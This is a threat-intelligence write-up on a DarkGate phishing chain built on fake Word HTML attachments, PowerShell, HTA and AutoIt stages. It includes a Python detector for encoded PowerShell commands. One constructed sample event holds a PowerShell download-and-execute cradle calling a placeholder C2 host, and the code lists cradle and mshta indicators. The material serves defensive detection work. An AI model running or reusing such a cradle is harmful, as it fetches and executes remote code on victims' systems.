Phishing attackers are using social engineering to distribute malicious HTML attachments by email. The attachments are disguised as legitimate Microsoft Word documents and prompt the recipient to click deceptive buttons, starting a sequence that leads to the download and execution of harmful scripts. The malicious code, typically Base64-encoded, instructs the user either to press keyboard shortcuts or to run PowerShell commands manually, potentially compromising the system.
Upon execution, the PowerShell script downloads additional components from a command-and-control (C2) server, which in turn run further PowerShell commands retrieved from the same C2. This multi-stage infection chain involves downloading and executing HTA files and AutoIt scripts, and relies on obfuscation to evade detection. Traditional signature-based methods may fail to detect the complex infection chain used by the DarkGate malware, increasing the risk to users.
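The user-run PowerShell stage described above leaves a recognisable trace in process-creation telemetry: an encoded command whose decoded text contains a download-and-run cradle or a call into the HTA stage. The following added example (not from the original report) decodes `-EncodedCommand` payloads from constructed Sysmon-style events and flags the ones matching that pattern; the event fields, the `c2.invalid` URL and the sample commands are all constructed for illustration.

```python
import base64
import re

# Constructed Sysmon-style process-creation events; none of this is real telemetry.
def _enc(ps_command):
    # PowerShell -EncodedCommand expects Base64 over UTF-16LE text.
    return base64.b64encode(ps_command.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"ParentImage": "C:\\Windows\\explorer.exe",  # launched by the user, as the lure instructs
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + _enc("IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/stage2')")},
    {"ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "powershell.exe -EncodedCommand " + _enc("Get-Date")},  # benign encoded command
    {"ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\backup.ps1"},  # no encoded payload at all
]

ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Substrings that mark a download-and-run cradle or the HTA stage of the chain.
INDICATORS = ("invoke-expression", "iex ", "iex(", "downloadstring", "invoke-webrequest",
              "frombase64string", "mshta", ".hta")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def scan_event(event):
    """Flag an event whose decoded command contains cradle or HTA indicators."""
    decoded = decode_encoded_command(event["CommandLine"])
    if decoded is None:
        return None
    hits = [i for i in INDICATORS if i in decoded.lower()]
    if not hits:
        return None
    return {"ParentImage": event["ParentImage"], "Decoded": decoded, "Indicators": hits}

def scan_events(events):
    return [f for f in map(scan_event, events) if f is not None]

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

Pairing the flag with the parent image (here `explorer.exe`, consistent with a user typing the command) helps separate this lure from encoded commands spawned by legitimate management tooling.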
To mitigate the risk of infection, users are advised to exercise caution when handling files from untrusted sources, especially email attachments and URLs. Multiple threats, including phishing emails, malicious scripts, trojans, and potential execution of malicious PowerShell code, have been detected in connection with these phishing campaigns. The presence of suspicious files retrieved from various URLs underscores the importance of vigilance in identifying and avoiding potential phishing or malware attacks.